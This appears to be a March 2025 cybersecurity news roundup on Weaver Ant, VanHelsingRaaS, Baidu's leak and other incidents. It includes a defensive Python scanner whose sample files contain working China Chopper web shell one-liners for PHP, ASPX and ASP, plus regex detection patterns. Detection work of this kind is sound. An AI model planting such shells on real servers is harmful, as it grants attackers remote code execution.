Global Cyber Pulse: March 26, 2025

March 25, 2025 | Cybersecurity
By Ashwani Mishra, Editor-Technology, 63SATS

The first batch of cyber commandos trained at IIIT Kottayam has completed an intensive six-month program, equipping them with skills in ethical hacking and digital forensics. Meanwhile, Baidu faces scrutiny over a data leak allegedly linked to an executive’s daughter. Chinese hacker group Weaver Ant infiltrated a telecom provider’s network for four years, using stealth techniques. North Korea has launched Research Center 227 to enhance AI-powered cyber warfare. Ukraine’s railway system suffered a major cyber-attack, disrupting ticket sales. Lastly, the newly emerged VanHelsingRaaS ransomware operation is rapidly gaining traction, targeting multiple platforms and demanding ransoms up to $500,000.

Cyber Commandos Graduate from IIIT Training Program, Ready for Deployment

A new battalion of cyber warriors has officially completed its rigorous training at the Indian Institute of Information Technology (IIIT), Kottayam. This elite group of 30 cyber commandos, selected from various state police forces across India, has undergone an intensive six-month training regimen focused on cyber defense, ethical hacking, digital forensics, and penetration testing.

The initiative, spearheaded by the Indian Cyber Crime Coordination Centre (I4C), aims to fortify India’s digital resilience. These commandos were chosen through a nationwide selection process, ensuring that only the best minds in law enforcement were entrusted with the responsibility of protecting the nation’s digital assets. A formal passing-out ceremony is set to take place in Thiruvananthapuram, marking a new chapter in India’s cybersecurity landscape.

Data Leak at Baidu Raises Privacy Concerns

Chinese tech giant Baidu is under scrutiny following reports that a senior executive’s teenage daughter allegedly posted other users’ private data online. The controversy erupted after social media users accused the daughter of Baidu Vice President Xie Guangjun of sharing sensitive personal information, including phone numbers, during an online dispute.

The allegations have fueled concerns about internal access controls at one of China’s largest cloud service providers. Baidu has categorically denied any compromise of its internal systems, asserting that its executives have no access to user data outside their authorized roles. According to the company, the leaked information came from “doxing databases,” repositories of previously stolen data that circulate on illicit online platforms, rather than from Baidu itself. Baidu has since filed a police report over the allegations and what it calls misinformation surrounding the incident; its account of where the data originated is, so far, the company’s own.

Weaver Ant Hackers Spent Four Years Inside Telecom Network

A sophisticated cyber espionage campaign has come to light, revealing that the China-linked hacking group Weaver Ant covertly infiltrated a major Asian telecommunications provider for more than four years. The group routed its traffic through compromised Zyxel CPE routers to hide its origin and deployed multiple variants of the China Chopper web shell, along with a newly discovered web shell dubbed ‘INMemory.’

Cybersecurity firm Sygnia, which investigated the attack, reported that Weaver Ant was remarkably persistent, regaining its foothold after repeated attempts to evict it from the network. That prolonged access allowed the group to collect intelligence, manipulate data traffic and, potentially, disrupt telecommunications infrastructure. The case is a reminder that a patient, state-backed intruder can sit inside a network for years, and that eradication has to be complete, compromised edge devices such as customer routers included, or the actor simply returns.
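One check a defender can run after reading about a China Chopper deployment is a sweep of web roots for the shell’s well-known one-line form. The script below is an added example written for this page; it is not Sygnia’s tooling and not taken from the Weaver Ant report. It matches the published China Chopper one-liners for PHP, ASPX and classic ASP by their “eval whatever the request sent” shape (deliberately ignoring the parameter name, which operators change), and runs over a small set of sample files constructed inline, including benign files that mention eval without executing request data.

```python
"""Sweep a web root for China Chopper-style one-line web shells.

Added example for this page, not code from Sygnia or the Weaver Ant report.
Signatures reflect the public China Chopper one-liners; the sample web root
built by build_sample_root() is constructed here for demonstration only.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Each pattern keys on the shell executing attacker-controlled request input.
# The parameter name ("password" in the published samples) is not matched.
SIGNATURES = {
    "chopper_php": re.compile(r"@?\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    "chopper_aspx": re.compile(r"\beval\s*\(\s*Request\.Item\s*\[", re.I),
    "chopper_asp": re.compile(r"\beval\s*\(?\s*request\s*\(", re.I),
}

# Server-side extensions worth reading; static assets are skipped.
WEB_EXTENSIONS = {".php", ".phtml", ".asp", ".aspx", ".ashx", ".asmx", ".jsp", ".jspx"}


def classify(text: str) -> list[str]:
    """Return the sorted names of every signature that matches the given source text."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def scan_file(path: Path) -> list[str]:
    """Classify one file's contents; unreadable files are reported as clean."""
    try:
        return classify(path.read_text(errors="replace"))
    except OSError:
        return []


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Walk a web root and return {relative_path: [matched signatures]} for hits only."""
    hits: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTENSIONS:
            matched = scan_file(path)
            if matched:
                hits[path.relative_to(root).as_posix()] = matched
    return hits


# Constructed sample web root: three shells in the published one-liner form,
# plus benign files that mention eval or request data without executing it.
SAMPLE_FILES = {
    "uploads/x.php": "<?php @eval($_POST['password']);?>",
    "aspnet_client/cmd.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
    "old/z.asp": '<%eval request("pass")%>',
    "index.php": "<?php echo htmlspecialchars($_POST['name'] ?? ''); ?>",
    "lib/notes.php": "<?php // never call eval() on request data\n$x = 1;",
    "lib/util.js": "const v = JSON.parse(body); // never eval(request)",
}


def build_sample_root() -> Path:
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    for rel, content in SAMPLE_FILES.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
    return root


def demo() -> dict[str, list[str]]:
    """Scan the constructed sample root; only the three shells should be reported."""
    return scan_tree(build_sample_root())


if __name__ == "__main__":
    for rel, sigs in demo().items():
        print(f"{rel}: {', '.join(sigs)}")
```

Two caveats follow from the article itself. A content sweep only finds shells that were written to disk; a shell that lives purely in server process memory, as the ‘INMemory’ name suggests, needs memory forensics or behavioural detection (for example, a web server worker spawning a shell) rather than file scanning. And because the operators proxied through compromised customer routers, the source addresses in web logs belong to victims’ CPE devices, so blocking them evicts nobody; the router population has to be cleaned as part of eradication.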

North Korea Expands Cyber Warfare Capabilities with Research Center 227

North Korea has intensified its focus on cyber warfare by establishing Research Center 227, a newly formed division under the military’s Reconnaissance General Bureau (RGB). This facility, operational since March 9, 2025, is dedicated to enhancing the country’s offensive cyber capabilities, with a particular emphasis on AI-driven hacking technologies.

Unlike existing RGB-affiliated institutions that focus primarily on intelligence gathering, Research Center 227 is designed to develop cutting-edge cyber attack methodologies. The center’s objectives include creating tools to bypass security defenses, advancing AI-powered cyber infiltration techniques, and automating large-scale data collection and analysis. The move signals North Korea’s commitment to expanding its cyber warfare arsenal, raising concerns among global cybersecurity agencies.

Ukraine’s Railway Network Disrupted by Major Cyber Attack

Ukraine’s railway system has become the latest target of a large-scale cyber attack, rendering online ticket purchases temporarily unavailable. Ukrzaliznytsia, the country’s national railway operator, confirmed the attack on its Telegram channel, describing it as “systematic, complex, and multi-layered.”

As a precaution, the company has temporarily suspended online ticket sales, advising passengers to purchase tickets at railway station counters, where additional staff have been deployed to manage the surge in demand. Ukrainian cybersecurity agencies, including the Cyber Department of the Security Service of Ukraine (SBU) and the Computer Emergency Response Team (CERT-UA), are actively investigating the breach and working to restore affected services. The incident highlights the growing threat to critical infrastructure posed by sophisticated cybercriminal groups.

VanHelsingRaaS: A New Ransomware Threat Emerges

A new ransomware-as-a-service (RaaS) operation, dubbed VanHelsingRaaS, has rapidly gained traction in the cybercrime ecosystem since its launch on March 7, 2025. Within two weeks of its emergence, the malware had already compromised three organizations, with ransom demands soaring as high as $500,000.

According to a report from Check Point Research (CPR), VanHelsingRaaS operates on a profit-sharing model, offering 80% of ransom payments to affiliates while retaining 20% for its operators. Affiliates must pay a $5,000 deposit to join the network, though trusted members are granted free access. The ransomware is designed to target multiple platforms, including Windows, Linux, BSD, ARM, and ESXi systems, making it a versatile and formidable threat.

Notably, VanHelsingRaaS follows the same geopolitical exclusion strategy as other Russian-linked ransomware groups, refraining from encrypting systems in Commonwealth of Independent States (CIS) countries. Its rapid spread raises alarms about the evolving sophistication of cybercriminal syndicates and the increasing risks faced by businesses worldwide.